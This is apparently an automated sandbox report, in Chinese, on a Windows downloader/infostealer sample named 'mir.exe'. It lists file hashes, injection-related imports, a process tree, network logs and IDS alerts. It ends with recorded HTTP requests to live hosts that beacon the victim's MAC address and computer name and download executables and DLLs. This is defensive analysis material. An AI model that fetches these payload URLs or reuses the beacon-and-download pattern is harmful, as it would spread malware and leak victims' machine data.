恶意软件分析 & URL链接扫描免费在线病毒分析平台

分析任务

分析类型	虚拟机标签	开始时间	结束时间	持续时间
文件 (Windows)	win7-sp1-x64-shaapp01-1	2020-04-08 20:44:40	2020-04-08 20:46:46	126 秒

魔盾分数

10.0

Infostealer病毒

文件详细信息

文件名	mir.exe
文件大小	155136 字节
文件类型	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	8c94cc081cdb526531997c64d1289e99
SHA1	a1e4cf06b9d00b4a4910b4b754f07856432a4e69
SHA256	7efe2742331e3a079427defa5ba50fa93065c5d8697b0c56c5061ba3efa9e590
SHA512	3db91a5a3646131af60db31a43ebaf7e6f8a6fd2c6c81e1de0815801f9655ef1144a11918940b40aabb55d2ccfaa33b5315ce9a8bf6bdbed918640b877c0117f
CRC32	83037713
Ssdeep	3072:Mhb//xQMZDq/qh9B3pU3FsUdS8WOjym6FHXiZRVMYj1Dkg:MZ/xQMZeaf3WeOS873OcMYj1Dkg
Yara	登录查看Yara规则
	样本下载提交误报

登录查看威胁特征

运行截图

访问主机纪录 (可点击查询WPING实时安全评级)

无主机纪录.

域名解析 (可点击查询WPING实时安全评级)

域名	安全评级	响应
stat.fei163.com	A 114.55.147.224
down.fei163.com	未知	A 47.114.169.177
down.ttwz07.com	未知	A 47.114.164.183
sf.ttwz07.com	未知
www.baidu.com	CNAME www.a.shifen.com A 180.101.49.11 A 180.101.49.12
m.baidu.com	CNAME wap.n.shifen.com A 180.101.49.19 A 180.101.49.20
dss1.bdstatic.com	CNAME sslbaiduv6.jomodns.com A 180.163.198.33

摘要

登录查看详细行为信息

PE 信息

初始地址	0x00400000
入口地址	0x0040a3b6
声明校验值	0x00000000
实际校验值	0x0002aacc
最低操作系统版本要求	6.0
PDB路径	D:\DownLoader\DownDll\Release\downloader.pdb
编译时间	2020-03-26 20:19:43
载入哈希	b46d492553bdb08f6266b5d2cdbf89c4

PE 数据组成

名称	虚拟地址	虚拟大小	原始数据大小	特征	熵(Entropy)
.text	0x00001000	0x0001a8bb	0x0001aa00	IMAGE_SCN_CNT_CODE\|IMAGE_SCN_MEM_EXECUTE\|IMAGE_SCN_MEM_READ	6.65
.rdata	0x0001c000	0x000077a4	0x00007800	IMAGE_SCN_CNT_INITIALIZED_DATA\|IMAGE_SCN_MEM_READ	4.93
.data	0x00024000	0x00003700	0x00001a00	IMAGE_SCN_CNT_INITIALIZED_DATA\|IMAGE_SCN_MEM_READ\|IMAGE_SCN_MEM_WRITE	3.07
.rsrc	0x00028000	0x00000288	0x00000400	IMAGE_SCN_CNT_INITIALIZED_DATA\|IMAGE_SCN_MEM_READ	3.85
.reloc	0x00029000	0x00001860	0x00001a00	IMAGE_SCN_CNT_INITIALIZED_DATA\|IMAGE_SCN_MEM_DISCARDABLE\|IMAGE_SCN_MEM_READ	6.41

资源

名称	偏移量	大小	语言	子语言	熵(Entropy)	文件类型
RT_MANIFEST	0x00028060	0x00000224	LANG_ENGLISH	SUBLANG_ENGLISH_US	5.04	XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators

导入

库: IPHLPAPI.DLL:

• 0x41c010 GetAdaptersInfo

库: imagehlp.dll:

• 0x41c1b4 MakeSureDirectoryPathExists

库: WS2_32.dll:

• 0x41c184 connect

• 0x41c188 inet_ntoa

• 0x41c18c WSAStartup

• 0x41c190 htons

• 0x41c194 setsockopt

• 0x41c198 WSACleanup

• 0x41c19c recv

• 0x41c1a0 socket

• 0x41c1a4 closesocket

• 0x41c1a8 gethostbyname

• 0x41c1ac send

库: ADVAPI32.dll:

• 0x41c000 OpenProcessToken

• 0x41c004 AdjustTokenPrivileges

• 0x41c008 LookupPrivilegeValueW

库: KERNEL32.dll:

• 0x41c018 GetFileAttributesExW

• 0x41c01c CreateProcessA

• 0x41c020 GetExitCodeProcess

• 0x41c024 WaitForSingleObject

• 0x41c028 WriteConsoleW

• 0x41c02c OutputDebugStringW

• 0x41c030 FlushFileBuffers

• 0x41c034 CreateFileW

• 0x41c038 SetEnvironmentVariableA

• 0x41c03c SetEndOfFile

• 0x41c040 GetStringTypeW

• 0x41c044 GetComputerNameA

• 0x41c048 VirtualQuery

• 0x41c04c GetPrivateProfileIntA

• 0x41c050 WideCharToMultiByte

• 0x41c054 Sleep

• 0x41c058 GetModuleFileNameW

• 0x41c05c MultiByteToWideChar

• 0x41c060 GetLastError

• 0x41c064 GetPrivateProfileStringA

• 0x41c068 LoadLibraryA

• 0x41c06c WinExec

• 0x41c070 CreateThread

• 0x41c074 GetCurrentProcess

• 0x41c078 GetModuleHandleW

• 0x41c07c OpenProcess

• 0x41c080 GlobalAlloc

• 0x41c084 CreateRemoteThreadEx

• 0x41c088 lstrcmpW

• 0x41c08c GetProcAddress

• 0x41c090 VirtualAllocEx

• 0x41c094 GlobalFree

• 0x41c098 Process32FirstW

• 0x41c09c Process32NextW

• 0x41c0a0 CreateToolhelp32Snapshot

• 0x41c0a4 CloseHandle

• 0x41c0a8 GetCurrentProcessId

• 0x41c0ac GetSystemTime

• 0x41c0b0 WriteProcessMemory

• 0x41c0b4 EncodePointer

• 0x41c0b8 DecodePointer

• 0x41c0bc ReadFile

• 0x41c0c0 GetSystemTimeAsFileTime

• 0x41c0c4 ExitProcess

• 0x41c0c8 GetModuleHandleExW

• 0x41c0cc AreFileApisANSI

• 0x41c0d0 HeapFree

• 0x41c0d4 HeapAlloc

• 0x41c0d8 GetCommandLineA

• 0x41c0dc RaiseException

• 0x41c0e0 RtlUnwind

• 0x41c0e4 IsDebuggerPresent

• 0x41c0e8 IsProcessorFeaturePresent

• 0x41c0ec DeleteFileW

• 0x41c0f0 HeapSize

• 0x41c0f4 EnterCriticalSection

• 0x41c0f8 LeaveCriticalSection

• 0x41c0fc GetConsoleMode

• 0x41c100 ReadConsoleW

• 0x41c104 SetLastError

• 0x41c108 GetCurrentThreadId

• 0x41c10c SetFilePointerEx

• 0x41c110 GetStdHandle

• 0x41c114 GetFileType

• 0x41c118 DeleteCriticalSection

• 0x41c11c GetStartupInfoW

• 0x41c120 UnhandledExceptionFilter

• 0x41c124 SetUnhandledExceptionFilter

• 0x41c128 InitializeCriticalSectionAndSpinCount

• 0x41c12c TerminateProcess

• 0x41c130 TlsAlloc

• 0x41c134 TlsGetValue

• 0x41c138 TlsSetValue

• 0x41c13c TlsFree

• 0x41c140 WriteFile

• 0x41c144 LoadLibraryExW

• 0x41c148 IsValidCodePage

• 0x41c14c GetACP

• 0x41c150 GetOEMCP

• 0x41c154 GetCPInfo

• 0x41c158 GetConsoleCP

• 0x41c15c GetProcessHeap

• 0x41c160 GetModuleFileNameA

• 0x41c164 QueryPerformanceCounter

• 0x41c168 GetEnvironmentStringsW

• 0x41c16c FreeEnvironmentStringsW

• 0x41c170 HeapReAlloc

• 0x41c174 SetStdHandle

• 0x41c178 CompareStringW

• 0x41c17c LCMapStringW

.text
`.rdata
@.data
.rsrc
@.reloc
C5hVB
Pj(h?VB
Vh` @
jdhp*B
VhB^B
<v5hB^B
j$hx+B
9=pdB
95@XB
SVWUj
;=\XB
t&9=@XB
+5<XB
address not available
already connected
argument list too long
argument out of domain
bad address
bad file descriptor
bad message
broken pipe
connection aborted
connection already in progress
connection refused
connection reset
destination address required
executable format error
file too large
host unreachable
identifier removed
illegal byte sequence
inappropriate io control operation
invalid seek
is a directory
message size
network down
network reset
network unreachable
no buffer space
no child process
no link
no message available
no message
no protocol option
no stream resources
no such device or address
no such process
not a directory
not a socket
not a stream
not connected
not supported
operation in progress
operation not permitted
operation not supported
operation would block
owner dead
protocol error
protocol not supported
read only file system
resource deadlock would occur
result out of range
state not recoverable
stream timeout
text file busy
timed out
too many files open in system
too many links
too many symbolic link levels
value too large
wrong protocol type
permission denied
file exists
no such device
filename too long
device or resource busy
io error
directory not empty
invalid argument
no space on device
no such file or directory
function not supported
no lock available
not enough memory
resource unavailable try again
cross device link
operation canceled
too many files open
permission_denied
address_in_use
address_not_available
address_family_not_supported
connection_already_in_progress
bad_file_descriptor
connection_aborted
connection_refused
connection_reset
destination_address_required
bad_address
host_unreachable
operation_in_progress
interrupted
invalid_argument
already_connected
too_many_files_open
message_size
filename_too_long
network_down
network_reset
network_unreachable
no_buffer_space
no_protocol_option
not_connected
not_a_socket
operation_not_supported
protocol_not_supported
wrong_protocol_type
timed_out
operation_would_block
address family not supported
address in use
bad allocation
CorExitProcess
COMSPEC
cmd.exe
Unknown exception
(null)
`h````
UTF-8
UTF-16LE
UNICODE
atan2
floor
ldexp
_cabs
_hypot
frexp
_logb
_nextafter
log10
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
CreateEventExW
CreateSemaphoreExW
SetThreadStackGuarantee
CreateThreadpoolTimer
SetThreadpoolTimer
WaitForThreadpoolTimerCallbacks
CloseThreadpoolTimer
CreateThreadpoolWait
SetThreadpoolWait
CloseThreadpoolWait
FlushProcessWriteBuffers
FreeLibraryWhenCallbackReturns
GetCurrentProcessorNumber
GetLogicalProcessorInformation
CreateSymbolicLinkW
SetDefaultDllDirectories
EnumSystemLocalesEx
CompareStringEx
GetDateFormatEx
GetLocaleInfoEx
GetTimeFormatEx
GetUserDefaultLocaleName
IsValidLocaleName
LCMapStringEx
GetCurrentPackageId
GetTickCount64
GetFileInformationByHandleExW
SetFileInformationByHandleW
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
March
April
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
bad exception
e+000
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__ptr64
__restrict
__unaligned
restrict(
 delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`RTTI
`local vftable'
`local vftable constructor closure'
 new[]
 delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
 Type Descriptor'
 Base Class Descriptor at (
 Base Class Array'
 Class Hierarchy Descriptor'
 Complete Object Locator'
MessageBoxW
GetActiveWindow
GetLastActivePopup
GetUserObjectInformationW
GetProcessWindowStation
SystemRoot
@mscoree.dll
(null)
kernel32.dll
runtime error 
Program: 
<program name unknown>
Microsoft Visual C++ Runtime Library
Aja-JP
zh-CN
ko-KR
zh-TW
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
March
April
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
en-US
zh-CHS
ar-SA
bg-BG
ca-ES
cs-CZ
da-DK
de-DE
el-GR
fi-FI
fr-FR
he-IL
hu-HU
is-IS
it-IT
nl-NL
nb-NO
pl-PL
pt-BR
ro-RO
ru-RU
hr-HR
sk-SK
sq-AL
sv-SE
th-TH
tr-TR
ur-PK
id-ID
uk-UA
be-BY
sl-SI
et-EE
lv-LV
lt-LT
fa-IR
vi-VN
hy-AM
az-AZ-Latn
eu-ES
mk-MK
tn-ZA
xh-ZA
zu-ZA
af-ZA
ka-GE
fo-FO
hi-IN
mt-MT
se-NO
ms-MY
kk-KZ
ky-KG
sw-KE
uz-UZ-Latn
tt-RU
bn-IN
pa-IN
gu-IN
ta-IN
te-IN
kn-IN
ml-IN
mr-IN
sa-IN
mn-MN
cy-GB
gl-ES
kok-IN
syr-SY
div-MV
quz-BO
ns-ZA
mi-NZ
ar-IQ
de-CH
en-GB
es-MX
fr-BE
it-CH
nl-BE
nn-NO
pt-PT
sr-SP-Latn
sv-FI
az-AZ-Cyrl
se-SE
ms-BN
uz-UZ-Cyrl
quz-EC
ar-EG
zh-HK
de-AT
en-AU
es-ES
fr-CA
sr-SP-Cyrl
se-FI
quz-PE
ar-LY
zh-SG
de-LU
en-CA
es-GT
fr-CH
hr-BA
smj-NO
ar-DZ
zh-MO
de-LI
en-NZ
es-CR
fr-LU
bs-BA-Latn
smj-SE
ar-MA
en-IE
es-PA
fr-MC
sr-BA-Latn
sma-NO
ar-TN
en-ZA
es-DO
sr-BA-Cyrl
sma-SE
ar-OM
en-JM
es-VE
sms-FI
ar-YE
en-CB
es-CO
smn-FI
ar-SY
en-BZ
es-PE
ar-JO
en-TT
es-AR
ar-LB
en-ZW
es-EC
ar-KW
en-PH
es-CL
ar-AE
es-UY
ar-BH
es-PY
ar-QA
es-BO
es-SV
es-HN
es-NI
es-PR
zh-CHT
af-za
ar-ae
ar-bh
ar-dz
ar-eg
ar-iq
ar-jo
ar-kw
ar-lb
ar-ly
ar-ma
ar-om
ar-qa
ar-sa
ar-sy
ar-tn
ar-ye
az-az-cyrl
az-az-latn
be-by
bg-bg
bn-in
bs-ba-latn
ca-es
cs-cz
cy-gb
da-dk
de-at
de-ch
de-de
de-li
de-lu
div-mv
el-gr
en-au
en-bz
en-ca
en-cb
en-gb
en-ie
en-jm
en-nz
en-ph
en-tt
en-us
en-za
en-zw
es-ar
es-bo
es-cl
es-co
es-cr
es-do
es-ec
es-es
es-gt
es-hn
es-mx
es-ni
es-pa
es-pe
es-pr
es-py
es-sv
es-uy
es-ve
et-ee
eu-es
fa-ir
fi-fi
fo-fo
fr-be
fr-ca
fr-ch
fr-fr
fr-lu
fr-mc
gl-es
gu-in
he-il
hi-in
hr-ba
hr-hr
hu-hu
hy-am
id-id
is-is
it-ch
it-it
ja-jp
ka-ge
kk-kz
kn-in
kok-in
ko-kr
ky-kg
lt-lt
lv-lv
mi-nz
mk-mk
ml-in
mn-mn
mr-in
ms-bn
ms-my
mt-mt
nb-no
nl-be
nl-nl
nn-no
ns-za
pa-in
pl-pl
pt-br
pt-pt
quz-bo
quz-ec
quz-pe
ro-ro
ru-ru
sa-in
se-fi
se-no
se-se
sk-sk
sl-si
sma-no
sma-se
smj-no
smj-se
smn-fi
sms-fi
sq-al
sr-ba-cyrl
sr-ba-latn
sr-sp-cyrl
sr-sp-latn
sv-fi
sv-se
sw-ke
syr-sy
ta-in
te-in
th-th
tn-za
tr-tr
tt-ru
uk-ua
ur-pk
uz-uz-cyrl
uz-uz-latn
vi-vn
xh-za
zh-chs
zh-cht
zh-cn
zh-hk
zh-mo
zh-sg
zh-tw
zu-za
USER32.DLL

没有防病毒引擎扫描信息!

进程树

mir.exe id: 2692
- cmd.exe id: 2860
- sesvc.exe id: 2452
- svchost.exe id: 2912
  - svchost.exe id: 2676
  - svchost.exe id: 2812

mir.exe, PID: 2692, 上一级进程 PID: 2320

缺省注册表文件系统网络进程线程服务设备同步加密浏览器全部

cmd.exe, PID: 2860, 上一级进程 PID: 2692

缺省注册表文件系统网络进程线程服务设备同步加密浏览器全部

sesvc.exe, PID: 2452, 上一级进程 PID: 2692

缺省注册表文件系统网络进程线程服务设备同步加密浏览器全部

svchost.exe, PID: 2912, 上一级进程 PID: 2692

缺省注册表文件系统网络进程线程服务设备同步加密浏览器全部

svchost.exe, PID: 2676, 上一级进程 PID: 2912

缺省注册表文件系统网络进程线程服务设备同步加密浏览器全部

svchost.exe, PID: 2812, 上一级进程 PID: 2912

缺省注册表文件系统网络进程线程服务设备同步加密浏览器全部

下载PCAP包

访问主机纪录 (可点击查询WPING实时安全评级)

无主机纪录.

TCP

源地址	源端口	目标地址	目标端口
192.168.122.201	49161	114.55.147.224 stat.fei163.com	680
192.168.122.201	49176	114.55.147.224 stat.fei163.com	680
192.168.122.201	49201	114.55.147.224 stat.fei163.com	680
192.168.122.201	49204	114.55.147.224 stat.fei163.com	680
192.168.122.201	49211	114.55.147.224 stat.fei163.com	680
192.168.122.201	49220	114.55.147.224 stat.fei163.com	680
192.168.122.201	49221	114.55.147.224 stat.fei163.com	680
192.168.122.201	49203	173.208.160.45	88
192.168.122.201	49219	173.208.160.45	666
192.168.122.201	49222	180.101.49.11 www.baidu.com	443
192.168.122.201	49223	180.101.49.11 www.baidu.com	443
192.168.122.201	49224	180.101.49.11 www.baidu.com	443
192.168.122.201	49225	180.101.49.11 www.baidu.com	443
192.168.122.201	49173	47.114.164.183 down.ttwz07.com	88
192.168.122.201	49175	47.114.164.183 down.ttwz07.com	88
192.168.122.201	49177	47.114.164.183 down.ttwz07.com	88
192.168.122.201	49178	47.114.164.183 down.ttwz07.com	88
192.168.122.201	49179	47.114.164.183 down.ttwz07.com	88
192.168.122.201	49180	47.114.164.183 down.ttwz07.com	88
192.168.122.201	49181	47.114.164.183 down.ttwz07.com	88
192.168.122.201	49182	47.114.164.183 down.ttwz07.com	88
192.168.122.201	49183	47.114.164.183 down.ttwz07.com	88
192.168.122.201	49184	47.114.164.183 down.ttwz07.com	447
192.168.122.201	49185	47.114.164.183 down.ttwz07.com	88
192.168.122.201	49186	47.114.164.183 down.ttwz07.com	88
192.168.122.201	49187	47.114.164.183 down.ttwz07.com	88
192.168.122.201	49188	47.114.164.183 down.ttwz07.com	447
192.168.122.201	49189	47.114.164.183 down.ttwz07.com	447
192.168.122.201	49190	47.114.164.183 down.ttwz07.com	447
192.168.122.201	49191	47.114.164.183 down.ttwz07.com	447
192.168.122.201	49192	47.114.164.183 down.ttwz07.com	447
192.168.122.201	49193	47.114.164.183 down.ttwz07.com	447
192.168.122.201	49194	47.114.164.183 down.ttwz07.com	447
192.168.122.201	49162	47.114.169.177 down.fei163.com	88
192.168.122.201	49163	47.114.169.177 down.fei163.com	88
192.168.122.201	49164	47.114.169.177 down.fei163.com	88
192.168.122.201	49165	47.114.169.177 down.fei163.com	88
192.168.122.201	49166	47.114.169.177 down.fei163.com	88
192.168.122.201	49167	47.114.169.177 down.fei163.com	88
192.168.122.201	49168	47.114.169.177 down.fei163.com	88
192.168.122.201	49171	47.114.169.177 down.fei163.com	88
192.168.122.201	49172	47.114.169.177 down.fei163.com	88
192.168.122.201	49200	63.141.246.178	80
192.168.122.201	49202	63.141.246.178	80

UDP

源地址	源端口	目标地址	目标端口
192.168.122.201	49157	192.168.122.1	53
192.168.122.201	50112	192.168.122.1	53
192.168.122.201	51384	192.168.122.1	53
192.168.122.201	51466	192.168.122.1	53
192.168.122.201	51896	192.168.122.1	53
192.168.122.201	58646	192.168.122.1	53
192.168.122.201	59968	192.168.122.1	53
192.168.122.201	62882	192.168.122.1	53
192.168.122.201	63974	192.168.122.1	53

域名解析 (可点击查询WPING实时安全评级)

域名	安全评级	响应
stat.fei163.com	A 114.55.147.224
down.fei163.com	未知	A 47.114.169.177
down.ttwz07.com	未知	A 47.114.164.183
sf.ttwz07.com	未知
www.baidu.com	CNAME www.a.shifen.com A 180.101.49.11 A 180.101.49.12
m.baidu.com	CNAME wap.n.shifen.com A 180.101.49.19 A 180.101.49.20
dss1.bdstatic.com	CNAME sslbaiduv6.jomodns.com A 180.163.198.33

TCP

源地址	源端口	目标地址	目标端口
192.168.122.201	49161	114.55.147.224 stat.fei163.com	680
192.168.122.201	49176	114.55.147.224 stat.fei163.com	680
192.168.122.201	49201	114.55.147.224 stat.fei163.com	680
192.168.122.201	49204	114.55.147.224 stat.fei163.com	680
192.168.122.201	49211	114.55.147.224 stat.fei163.com	680
192.168.122.201	49220	114.55.147.224 stat.fei163.com	680
192.168.122.201	49221	114.55.147.224 stat.fei163.com	680
192.168.122.201	49203	173.208.160.45	88
192.168.122.201	49219	173.208.160.45	666
192.168.122.201	49222	180.101.49.11 www.baidu.com	443
192.168.122.201	49223	180.101.49.11 www.baidu.com	443
192.168.122.201	49224	180.101.49.11 www.baidu.com	443
192.168.122.201	49225	180.101.49.11 www.baidu.com	443
192.168.122.201	49173	47.114.164.183 down.ttwz07.com	88
192.168.122.201	49175	47.114.164.183 down.ttwz07.com	88
192.168.122.201	49177	47.114.164.183 down.ttwz07.com	88
192.168.122.201	49178	47.114.164.183 down.ttwz07.com	88
192.168.122.201	49179	47.114.164.183 down.ttwz07.com	88
192.168.122.201	49180	47.114.164.183 down.ttwz07.com	88
192.168.122.201	49181	47.114.164.183 down.ttwz07.com	88
192.168.122.201	49182	47.114.164.183 down.ttwz07.com	88
192.168.122.201	49183	47.114.164.183 down.ttwz07.com	88
192.168.122.201	49184	47.114.164.183 down.ttwz07.com	447
192.168.122.201	49185	47.114.164.183 down.ttwz07.com	88
192.168.122.201	49186	47.114.164.183 down.ttwz07.com	88
192.168.122.201	49187	47.114.164.183 down.ttwz07.com	88
192.168.122.201	49188	47.114.164.183 down.ttwz07.com	447
192.168.122.201	49189	47.114.164.183 down.ttwz07.com	447
192.168.122.201	49190	47.114.164.183 down.ttwz07.com	447
192.168.122.201	49191	47.114.164.183 down.ttwz07.com	447
192.168.122.201	49192	47.114.164.183 down.ttwz07.com	447
192.168.122.201	49193	47.114.164.183 down.ttwz07.com	447
192.168.122.201	49194	47.114.164.183 down.ttwz07.com	447
192.168.122.201	49162	47.114.169.177 down.fei163.com	88
192.168.122.201	49163	47.114.169.177 down.fei163.com	88
192.168.122.201	49164	47.114.169.177 down.fei163.com	88
192.168.122.201	49165	47.114.169.177 down.fei163.com	88
192.168.122.201	49166	47.114.169.177 down.fei163.com	88
192.168.122.201	49167	47.114.169.177 down.fei163.com	88
192.168.122.201	49168	47.114.169.177 down.fei163.com	88
192.168.122.201	49171	47.114.169.177 down.fei163.com	88
192.168.122.201	49172	47.114.169.177 down.fei163.com	88
192.168.122.201	49200	63.141.246.178	80
192.168.122.201	49202	63.141.246.178	80

UDP

源地址	源端口	目标地址	目标端口
192.168.122.201	49157	192.168.122.1	53
192.168.122.201	50112	192.168.122.1	53
192.168.122.201	51384	192.168.122.1	53
192.168.122.201	51466	192.168.122.1	53
192.168.122.201	51896	192.168.122.1	53
192.168.122.201	58646	192.168.122.1	53
192.168.122.201	59968	192.168.122.1	53
192.168.122.201	62882	192.168.122.1	53
192.168.122.201	63974	192.168.122.1	53

HTTP 请求

SMTP 流量

无SMTP流量.

IRC 流量

无IRC请求.

ICMP 流量

无ICMP流量.

CIF 报告

无 CIF 结果

网络警报

Timestamp	Source IP	Source Port	Destination IP	Destination Port	Protocol	SID	Signature	Category
2020-04-08 20:45:08.555961+0800	47.114.169.177	88	192.168.122.201	49167	TCP	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
2020-04-08 20:45:09.131802+0800	47.114.169.177	88	192.168.122.201	49168	TCP	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
2020-04-08 20:45:09.594622+0800	47.114.169.177	88	192.168.122.201	49171	TCP	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
2020-04-08 20:45:11.124597+0800	47.114.169.177	88	192.168.122.201	49172	TCP	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
2020-04-08 20:45:25.492074+0800	63.141.246.178	80	192.168.122.201	49202	TCP	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
2020-04-08 20:46:19.297784+0800	47.114.164.183	88	192.168.122.201	49175	TCP	2014435	ET TROJAN Infostealer.Banprox Proxy.pac Download	A Network Trojan was detected

TLS

Timestamp	Source IP	Source Port	Destination IP	Destination Port	Version	Issuer	Subject	Fingerprint
2020-04-08 20:45:59.407872+0800	192.168.122.201	49222	180.101.49.11	443	TLS 1.2	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=CN, ST=beijing, L=beijing, OU=service operation department, O=Beijing Baidu Netcom Science Technology Co., Ltd, CN=baidu.com	d1:f6:32:3d:b6:f2:ec:81:e7:02:36:90:f4:9b:2d:91:e0:c3:99:3a

Suricata HTTP

No Suricata HTTP

未发现网络提取文件

抱歉! 没有任何文件投放。

没有发现相似的分析.

HTML 总结报告 (需15-60分钟同步)	下载

Processing ( 28.922 seconds )

12.714 NetworkAnalysis
9.734 Suricata
3.031 VirusTotal
2.461 BehaviorAnalysis
0.427 Static
0.287 TargetInfo
0.234 peid
0.019 AnalysisInfo
0.014 Strings
0.001 Memory

Signatures ( 3.168 seconds )

1.806 md_url_bl
0.134 api_spamming
0.112 stealth_timeout
0.107 antiav_detectreg
0.092 stealth_decoy_document
0.054 infostealer_ftp
0.05 antiav_detectfile
0.046 mimics_filetime
0.039 reads_self
0.037 md_domain_bl
0.035 infostealer_bitcoin
0.033 antidbg_windows
0.033 infostealer_im
0.032 stealth_file
0.032 maldun_anomaly_massive_file_ops
0.028 bootkit
0.026 virus
0.023 antivm_generic_disk
0.022 antianalysis_detectreg
0.02 antivm_vbox_files
0.019 infostealer_mail
0.016 infostealer_browser
0.014 infostealer_browser_password
0.012 antivm_generic_scsi
0.012 hancitor_behavior
0.011 kovter_behavior
0.011 rat_pcclient
0.01 antiemu_wine_func
0.009 injection_createremotethread
0.009 antisandbox_sleep
0.009 antidbg_devices
0.009 geodo_banking_trojan
0.008 maldun_malicious_write_executeable_under_temp_to_regrun
0.008 packer_themida
0.008 antivm_generic_services
0.008 antivm_vbox_window
0.008 betabot_behavior
0.008 kibex_behavior
0.008 anormaly_invoke_kills
0.007 maldun_anomaly_write_exe_and_obsfucate_extension
0.007 process_interest
0.006 network_tor
0.006 ipc_namedpipe
0.006 antisandbox_script_timer
0.006 ransomware_extensions
0.005 hawkeye_behavior
0.005 dridex_behavior
0.005 rat_luminosity
0.005 browser_needed
0.005 stealth_network
0.005 kazybot_behavior
0.005 anomaly_persistence_autorun
0.005 shifu_behavior
0.005 maldun_anomaly_write_exe_and_dll_under_winroot_run
0.005 vawtrak_behavior
0.005 antivm_parallels_keys
0.005 antivm_xen_keys
0.005 darkcomet_regkeys
0.005 network_http
0.005 ransomware_files
0.004 antivm_vbox_libs
0.004 injection_explorer
0.004 codelux_behavior
0.003 sets_autoconfig_url
0.003 injection_runpe
0.003 process_needed
0.003 securityxploded_modules
0.003 antivm_generic_diskreg
0.003 antivm_vmware_files
0.003 recon_fingerprint
0.002 tinba_behavior
0.002 virtualcheck_js
0.002 ransomware_message
0.002 heapspray_js
0.002 antisandbox_sunbelt_libs
0.002 exec_crash
0.002 dead_connect
0.002 cerber_behavior
0.002 sniffer_winpcap
0.002 antisandbox_productid
0.002 antivm_hyperv_keys
0.002 antivm_vbox_keys
0.002 antivm_vmware_keys
0.002 antivm_vpc_files
0.002 disables_browser_warn
0.002 malicous_targeted_flame
0.002 network_torgateway
0.001 rat_nanocore
0.001 antiav_avast_libs
0.001 disables_spdy
0.001 office_dl_write_exe
0.001 network_anomaly
0.001 antivm_vmware_libs
0.001 kelihos_behavior
0.001 antisandbox_sboxie_libs
0.001 antiav_bitdefender_libs
0.001 disables_wfp
0.001 bypass_firewall
0.001 antianalysis_detectfile
0.001 antisandbox_sunbelt_files
0.001 antivm_generic_bios
0.001 antivm_generic_cpu
0.001 antivm_generic_system
0.001 antivm_xen_keys
0.001 antivm_vbox_acpi
0.001 antivm_vpc_keys
0.001 banker_cridex
0.001 bot_drive
0.001 bot_drive2
0.001 browser_security
0.001 modify_proxy
0.001 maldun_malicious_drop_executable_file_to_temp_folder
0.001 maldun_anomaly_invoke_vb_vba
0.001 network_cnc_http
0.001 network_tor_service
0.001 packer_armadillo_regkey
0.001 recon_programs

Reporting ( 0.775 seconds )

0.71 ReportHTMLSummary
0.065 Malheur


Task ID	535187
Mongo ID	5e8dc7f1bb7d5727dd78b824
Cuckoo release	1.4-Maldun

URI	HTTP数据
URL专业沙箱检测 -> http://stat.fei163.com:680/http://stat.fei163.com:680/api/index/index?status=1&shop_id=101308&mac=52540064DCC0&client_name=TEST-PC&product_id=0	GET http://stat.fei163.com:680/api/index/index?status=1&shop_id=101308&mac=52540064DCC0&client_name=TEST-PC&product_id=0 HTTP/1.1 HOST: stat.fei163.com Connection: Close
URL专业沙箱检测 -> http://down.fei163.com:88/http://down.fei163.com:88/downservers.aspx?ShopId=101308	GET http://down.fei163.com:88/downservers.aspx?ShopId=101308 HTTP/1.1 HOST: down.fei163.com Connection: Close
URL专业沙箱检测 -> http://down.fei163.com:88/http://down.fei163.com:88/GetProDownConfig.aspx?ShopId=101308	GET http://down.fei163.com:88/GetProDownConfig.aspx?ShopId=101308 HTTP/1.1 HOST: down.fei163.com Connection: Close
URL专业沙箱检测 -> http://down.fei163.com:88/http://down.fei163.com:88/proxy/101308/51/config.txt	GET http://down.fei163.com:88/proxy/101308/51/config.txt HTTP/1.1 HOST: down.fei163.com Connection: Close
URL专业沙箱检测 -> http://down.fei163.com:88/http://down.fei163.com:88/proxy/101308/51/ExtensionDll.dll	GET http://down.fei163.com:88/proxy/101308/51/ExtensionDll.dll HTTP/1.1 HOST: down.fei163.com Connection: Close
URL专业沙箱检测 -> http://down.fei163.com:88/http://down.fei163.com:88/proxy/101308/51/SuoLock.exe	GET http://down.fei163.com:88/proxy/101308/51/SuoLock.exe HTTP/1.1 HOST: down.fei163.com Connection: Close
URL专业沙箱检测 -> http://down.fei163.com:88/http://down.fei163.com:88/proxy/101308/52/x86.dll	GET http://down.fei163.com:88/proxy/101308/52/x86.dll HTTP/1.1 HOST: down.fei163.com Connection: Close
URL专业沙箱检测 -> http://down.fei163.com:88/http://down.fei163.com:88/proxy/101072/88/svchnots.exe	GET http://down.fei163.com:88/proxy/101072/88/svchnots.exe HTTP/1.1 HOST: down.fei163.com Connection: Close
